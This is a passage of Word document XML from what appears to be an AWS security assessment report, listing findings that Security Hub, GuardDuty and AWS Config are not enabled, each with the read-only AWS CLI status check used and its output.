          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Account 292595537002 is not subscribed to AWS Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Hub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="74"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="74"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>occurred</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="59"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(InvalidAccessException)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="59"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="59"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>calling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="59"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="59"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DescribeHub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="59"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>operation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Account 292595537002 is not subscribed to AWS Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Hub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="161"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>note</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>similar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>occurs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>745354931789.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Guard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Duty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="134"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="705" w:right="366" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The following command describes the status of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Guard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Duty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>135</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>various</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>regions,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>which confirms </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Guard Duty </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>is not enabled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="96"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="95"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for r in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"us-east-1" "us-east-2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>; do aws guardduty --profile auth list-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>detectors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--region=$r; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="95"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"DetectorIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"DetectorIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>note</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>similar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>occurs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>745354931789.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="192"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="705" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>AWS Config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>136</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> is a service which maintains the configuration history for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>resources and evaluates best</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>practices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>determine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>whether the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>AWS Config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>is enabled for multiple regions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="95"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for r in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"us-east-1" "us-east-2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>; do aws configservice get-status --region=$r; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487619072">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>212374</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="85" name="Graphic 85"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="85" name="Graphic 85"/>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6.722387pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15697408;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape70" coordorigin="1440,334" coordsize="2880,0" path="m1440,334l4320,334e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>135</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
